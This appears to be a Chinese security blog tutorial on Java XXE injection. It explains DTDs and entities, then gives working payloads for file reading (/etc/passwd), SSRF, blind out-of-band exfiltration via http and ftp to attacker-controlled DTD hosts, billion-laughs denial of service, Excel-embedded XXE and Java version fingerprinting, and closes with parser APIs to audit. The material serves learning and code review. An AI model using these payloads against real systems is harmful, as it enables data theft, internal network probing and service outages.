JAVA XXE 从原理到利用

最新推荐文章于 2024-08-07 15:41:06 发布

网络安全工程师老王

最新推荐文章于 2024-08-07 15:41:06 发布

阅读量1k

点赞数 23

文章标签： web安全网络安全

本文链接：https://blog.csdn.net/2401_83799022/article/details/139346104

版权

XML External Entity Injection，全称为 XML 外部实体注入。在一篇文章中看到可以通过上传xlsx来实现xxe攻击，一搜发现是一个非常老套的攻击方式了。在搜到的文章中有一个令人在意的点，作者提到“由于是java的站，所以利用ftp协议读取文件”，java站和ftp协议有什么关系？此时也才发现之前对于xxe攻击几乎是只了解原理，完全不清楚实际利用的一些情况。于是决定学习梳理一番，毕竟感觉这个仍然可能是一个常见的WEB漏洞。
而xxe当然不仅存在于Java，php、python、C#这些常见语言也有。不过不同语言在实际利用、修复、审计上都有差别，都放在一篇内可能稍显杂乱。本文专注于Java中的xxe。

XML基础

XML文档结构包括XML声明、DTD文档类型定义（可选）、文档元素。

<!--XML申明-->
<?xml version="1.0"?> 

<!--文档类型定义-->
<!DOCTYPE note [  <!--定义此文档是 note 类型的文档-->
<!ELEMENT note (to,from,heading,body)>  <!--定义note元素有四个元素-->
<!ELEMENT to (#PCDATA)>     <!--定义to元素为”#PCDATA”类型-->
<!ELEMENT from (#PCDATA)>   <!--定义from元素为”#PCDATA”类型-->
<!ELEMENT head (#PCDATA)>   <!--定义head元素为”#PCDATA”类型-->
<!ELEMENT body (#PCDATA)>   <!--定义body元素为”#PCDATA”类型-->
]>

<!--文档元素-->
<note>
<to>Dave</to>
<from>Tom</from>
<head>Reminder</head>
<body>You are a good man</body>
</note>

但由于xxe漏洞只与DTD文档类型定义有关，下面开始只需要关注DTD即可。

DTD

全称为XML Document Type Declaration。根据其声明位置可分为内部DTD和外部DTD。When a DTD is declared within the file it is called Internal DTD and if it is declared in a separate file it is called External DTD.

Basic syntax of a DTD:

<!DOCTYPE element DTD identifier
[
   declaration1
   declaration2
   ........
]>

如今的xxe漏洞攻击中主要用到的是外部DTD。

External DTD

完整示例

example.xml:

<?xml version = "1.0" encoding = "UTF-8" standalone = "no" ?>
<!DOCTYPE address SYSTEM "address.dtd">

<address>
  <name>Tanmay Patil</name>
  <company>TutorialsPoint</company>
  <phone>(011) 123-4567</phone>
</address>

To reference it as external DTD, standalone attribute in the XML declaration must be set as no. This means, declaration includes information from the external source.
address.dtd:

<!ELEMENT address (name,company,phone)>
<!ELEMENT name (#PCDATA)>
<!ELEMENT company (#PCDATA)>
<!ELEMENT phone (#PCDATA)>

system identifiers / public identifiers

引用外部DTD可以使用SYSTEM或PUBLIC标志符，语法和含义不同，不过都可以在XXE攻击中使用。

System Identifiers:

<!DOCTYPE name SYSTEM "address.dtd" [...]>

system的属性可以是.dtd文件或者URL。

Public Identifiers:

<!DOCTYPE name PUBLIC "any text" "http://evil.com/evil.dtd">

小结

DOCTYPE是DTD声明的标志符，可以通过它来引用外部.dtd文件，这也是 exploiting blind XXE exfiltrate data out-of-band 中所使用的。而该方式也是现在主流的XXE攻击方式。
在XXE OOB攻击中，上述引用外部恶意.dtd文件的DOCTYPE声明是位于.xml文件中，该.xml文件通常需要上传到(受害者)目标服务端进行解析。一个可用的exp组合示例如下：

d1_step1.xml

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE xdsec[
        <!ENTITY % include SYSTEM "file:///Users/any/Downloads/java_xxe_2019/d1_step2.dtd" >
        %include;
        %define_http;%send_http;
        ]>
<books></books>

d1_step2.dtd

<!ENTITY % file SYSTEM "file:///Users/any/Downloads/java_xxe_2019/multi_line.txt">
<!ENTITY % define_http "<!ENTITY % send_http SYSTEM 'http://localhost:1234/%file;'>">

Entities

一开始提到了，XXE全称为XML External Entity Injection，这个Entity就是作为DTD Body的一部分。

Entity也是根据其声明位置被划分为 internal entity / external entity。

External Entity

If an entity is declared outside a DTD it is called as external entity. You can refer to an external Entity by either using system identifiers or public identifiers.

Syntax for External Entity declaration:

<!ENTITY name SYSTEM "URI/URL">

name is the name of entity.
SYSTEM is the keyword. (可替换为PUBLIC，与前文DOCTYPE声明语法一致)
URI/URL is the address of the external source enclosed within the double or single quotes.

Parameter entities

实体有两种划分方式，第一种就是上面根据声明位置被划分为内部实体与外部实体。另一种是根据类型划分：

Built-in entities
Character entities
General entities
Parameter entities

需要关注的是最后一种，参数实体，在实际的XXE攻击中会用到。至于为什么不用 General entities，原因如下：

Sometimes, XXE attacks using regular entities are blocked, due to some input validation by the application or some hardening of the XML parser that is being used. In this situation, you might be able to use XML parameter entities instead.

The purpose of a parameter entity is to enable you to create reusable sections of replacement text.

Syntax for parameter entity declaration:

<!ENTITY % ename "entity_value">

entity_value is any character that is not an &, % or ".

实际利用

Normal XXE

适用于有回显的情况。

Exploiting XXE to retrieve files

An external entity is defined containing the contents of a file, and returned in the application's response.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

需要注意的是，如果file中包含一些xml语法的特殊字符，可能会被解析引擎识别并执行。但我们的目的只是需要得到文件中所有内容。因此可以将CDATA与参数实体结合使用。
xml_payload:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE roottag [
<!ENTITY % start "<![CDATA[">   
<!ENTITY % goodies SYSTEM "file:///d:/test.txt">  
<!ENTITY % end "]]>">  
<!ENTITY % dtd SYSTEM "http://ip/evil.dtd"> 
%dtd; ]> 

<roottag>&all;</roottag>

evil.dtd:

<?xml version="1.0" encoding="UTF-8"?> 
<!ENTITY all "%start;%goodies;%end;">

文件读取如果是从网络探测的角度，可以考虑/etc/network/interfaces、/proc/net/arp、/etc/hosts等文件。

Exploiting XXE to perform SSRF attacks

An external entity is defined based on a URL to a back-end system.

<!--General entities-->
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable-website.com/"> ]>
<!--Parameter entities-->
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> %xxe; ]>

常用于探测内网主机，直接根据回显内容判定。

Blind XXE

在如今的实际环境中，几乎都不存在回显，因此需要别的方式将数据带出。

Exploiting blind XXE exfiltrate data out-of-band

Sensitive data is transmitted from the application server to a system that the attacker controls.
step1.xml:

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE xdsec[
        <!ENTITY % include SYSTEM "file:///Users/any/Downloads/java_xxe_2019/step2.dtd" >
        %include;
        %define_http;%send_http;
        ]>
<books></books>

step2.dtd:

<!ENTITY % file SYSTEM "file:///Users/any/Downloads/java_xxe_2019/multi_line.txt">
<!ENTITY % define_http "<!ENTITY &#37; send_http SYSTEM 'http://localhost:1234/%file;'>">

其解析过程为：

定义了如下参数实体，%include、%define_http、c、%file。
%include先被调用，去请求远程服务器上的dtd文件，对文件进行包含。(这里测试用的本地文件，可以替换为"http://ip/xxxx.dtd")
执行%define_http，它需要先去获取%file的内容进行拼接，将结果填入到%send_http。注意因为实体的值中不能包含%，所以转为html编码 %或者 %。
执行%send_http，将%file的内容作为请求URL的一部分进行发送。

Exploiting blind XXE to retrieve data via error messages

Attacker can trigger a parsing error message containing sensitive data.
严格意义上这个应该是很难回显出数据的，因为现在通常是无法看到java的具体报错。
具体参考：https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-retrieve-data-via-error-messages

Exploiting XXE with local DTD files

这个比较像是上面Exploiting blind XXE to retrieve data via error messages的升级版。前面提到的攻击几乎都必须去请求远程服务器上的dtd文件，但如果有防火墙就无法使用了。因此 Arseniy Sharoglazov 提出了可以使用本地 DTD (~2016-2018) 进行基于错误的文件泄露。
简单来说就是将我们原本使用的远程服务器上的dtd变更为了服务器上的本地dtd，去redefine其中的参数实体，再结合报错实现回显。这些本地dtd是采用了搜集各种系统/应用会有的默认dtd路径。

具体详细内容查看 -> https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-/
相关工具 - >https://github.com/GoSecure/dtd-finder

JSON content-type XXE

原始请求和响应：
HTTP Request:
POST /netspi HTTP/1.1
Host: http://someserver.netspi.com
Accept: application/json
Content-Type: application/json
Content-Length: 38
{"search":"name","value":"netspitest"}
HTTP Response:
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 43
{"error": "no results for name netspitest"}
现在我们尝试将 Content-Type 修改为 application/xml。
进一步请求和响应：
HTTP Request:
POST /netspi HTTP/1.1
Host: http://someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 38
{"search":"name","value":"netspitest"}
HTTP Response:
HTTP/1.1 500 Internal Server Error
Content-Type: application/json
Content-Length: 127
{"errors":{"errorMessage":"org.xml.sax.SAXParseException: XML document structures must start and end within the same entity."}}
可以发现服务器端是能处理 xml 数据的，于是我们就可以利用这个来进行攻击。
最终的请求和响应：
HTTP Request:
POST /netspi HTTP/1.1
Host: http://someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 288
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root></root>
<search>name</search>
<value>&xxe;</value>
</root>
HTTP Response:
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 2467
{"error": "no results for name root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync....

DDOS

如下的递归引用，从下至上以指数形式增多
!xml
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
回忆一下解析过程，当XML处理器载入这个文档的时候，它会包含根元素，而里面定义了实体&lol9 ，而19实体扩展成了包含了“&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;”这个字符串。
如此递归上去，压入内存的东西呈指数增长，实验发现，一个小于1KB的XML攻击payload能消耗3GB的内存。

没有实验过，但这个确实是第一次知道可以这样实现XXE DDOS。

Excel XXE

该利用方式似乎最早是在这篇文章https://www.4armed.com/blog/exploiting-xxe-with-excel/提出的。
这里说是Excel XXE，但其实对于Word or Powerpoint都是通用的，只是在实际场景中，Excel上传更为常见。
在macOS新建Microsoft pptx/word/xlsx，然后以zip形式解压：

和正常的XXE攻击其实没有太大区别，只是把payload放到了解压后里面的xml中，然后再压缩回到pptx/word/xlsx，上传后在解析过程中就会触发XXE payload。
但不是把payload放置在任意一个xml都能被触发，对于Excel可以将payload放置在xl/workbook.xml，因为大多数应用程序似乎都将xl/workbook.xml放入其XML解析器中以获取工作表列表，然后分别读取每个工作表以获取单元格内容。

协议支持

http

d1_step1.xml :

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE xdsec[
        <!ENTITY % include SYSTEM "file:///Users/any/Downloads/java_xxe_2019/d1_step2.dtd" >
        %include;
        %define_http;%send_http;
        ]>
<books></books>

d1_step2.dtd :

<!ENTITY % file SYSTEM "file:///Users/any/Downloads/java_xxe_2019/multi_line.txt">
<!ENTITY % define_http "<!ENTITY % send_http SYSTEM 'http://localhost:1234/%file;'>">

在处理 httpURL 的时候，如果字符串含有换行符\n就会直接抛出异常，而一般通过 http 外带基本只能拼接到 url 中，所以碰到需要往外带的数据含有换行符时就会失败。因此对于Java，http外带并不是优选。

ftp

d2_step1.xml :

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE xdsec[
        <!ENTITY % include SYSTEM "file:///Users/any/Downloads/java_xxe_2019/d2_step2.dtd" >
        %include;
        %define_ftp;%send_ftp;
        ]>
<books></books>

d2_step2.dtd :

<!ENTITY % file SYSTEM "file:///Users/any/Downloads/java_xxe_2019/multi_line.txt">
<!ENTITY % define_ftp "<!ENTITY % send_ftp SYSTEM 'ftp://localhost:2121/%file;'>">

使用ftp进行外带时，版本 <7u141 和 <8u162 才可以读取整个文件，因为高版本也加入了对换行符的限制。
有师傅对于版本这块做了更细化的总结：

利用 XXE 漏洞通过 FTP 协议外带数据时，能否成功受 Java 版本影响，总结如下
<7u141-b00 或 <8u131-b09 ：不会受文件中\n的影响；
jdk8u131：能创建 FTP 连接，外带文件内容中含有\n则抛出异常；
jdk8u232：不能创建 FTP 连接，只要 url 中含有\n就会抛出异常；

获取Java版本

ftp.dtd :

<!ENTITY % file SYSTEM "file:///D:/data.txt">
<!ENTITY % ftp "<!ENTITY &#37; send SYSTEM 'ftp://127.0.0.1:2121/%file;'>">

当不指定用户名和密码直接连接 FTP 时，client 默认会以 anonymous 登录，密码则是 client 的 Java 版本，所以可以利用这个方式获取目标服务器的 Java 版本：

info: FTP: recvd 'USER anonymous'
info: FTP: recvd 'PASS Java1.7.0_21@'
info: FTP: recvd 'TYPE I'
info: FTP: recvd 'EPSV ALL'
info: FTP: recvd 'EPSV'
info: FTP: recvd 'EPRT |1|127.0.0.1|54357|'
info: FTP: recvd 'RETR tesdata'

特殊字符限制

所有的【\r】都会被替换为【\n】
如果含有特殊字符【%】【&】会完全出错。
如果含有特殊字符【’】【”】可以稍微绕过。
如果含有特殊字符【?】，对 http 无影响，对 ftp 会造成截断。
如果含有特殊字符【/】，对 http 无影响，对 ftp 需要额外增加解析的 case。
如果含有特殊字符【#】，会造成截断。

jar

这个协议目前在利用中似乎比较鸡肋，原因1，上传的位置未知文件名未知，需要有报错回显才知道；原因2，上传完毕后会被删除，虽然可以在文件末尾加垃圾字符在未完全传输时进行包含，但利用起来还是比较trick了；原因3，文件后缀不可控，为.tmp。

jar 协议处理文件的过程：

下载 jar/zip 文件到临时文件中
提取出我们指定的文件
删除临时文件

除了用于文件上传，还能实现DDOS，未尝试：

jar协议jar: http://host/application.jar!/file/within/the/zip会导致服务器首先取得文件然后解压这个以jar开头！结尾的包并提取后面的文件。从攻击者的角度看，完全能够定制一些高压缩比的包（比如1000：1）这些ZIP炸弹能用来攻击反病毒系统，或者用来消耗目标机的硬盘/内存资源。

netdoc

这个协议在XXE中和file起到的作用是相同的，都用于读文件。

同时可以用于列目录：

file协议也一样可以列目录。

代码审计

XML解析一般在导入配置、数据传输接口等场景可能会用到，涉及到XML文件处理的场景可查看XML解析器是否禁用外部实体，从而判断是否存在XXE。部分XML解析接口（常见漏洞出现函数）如下：

javax.xml.parsers.DocumentBuilderFactory;
javax.xml.parsers.SAXParser
javax.xml.transform.TransformerFactory
javax.xml.validation.Validator
javax.xml.validation.SchemaFactory
javax.xml.transform.sax.SAXTransformerFactory
javax.xml.transform.sax.SAXSource
org.xml.sax.XMLReader
DocumentHelper.parseText
DocumentBuilder
org.xml.sax.helpers.XMLReaderFactory
org.dom4j.io.SAXReader
org.jdom.input.SAXBuilder
org.jdom2.input.SAXBuilder
javax.xml.bind.Unmarshaller
javax.xml.xpath.XpathExpression
javax.xml.stream.XMLStreamReader
org.apache.commons.digester3.Digester
rg.xml.sax.SAXParseExceptionpublicId

网络安全工程师老王

关注

23
点赞
踩
17

收藏

觉得还不错? 一键收藏
0
评论
JAVA XXE 从原理到利用

在搜到的文章中有一个令人在意的点，作者提到“由于是java的站，所以利用ftp协议读取文件”，java站和ftp协议有什么关系？简单来说就是将我们原本使用的远程服务器上的dtd变更为了服务器上的本地dtd，去redefine其中的参数实体，再结合报错实现回显。和正常的XXE攻击其实没有太大区别，只是把payload放到了解压后里面的xml中，然后再压缩回到pptx/word/xlsx，上传后在解析过程中就会触发XXE payload。需要关注的是最后一种，参数实体，在实际的XXE攻击中会用到。
复制链接

扫一扫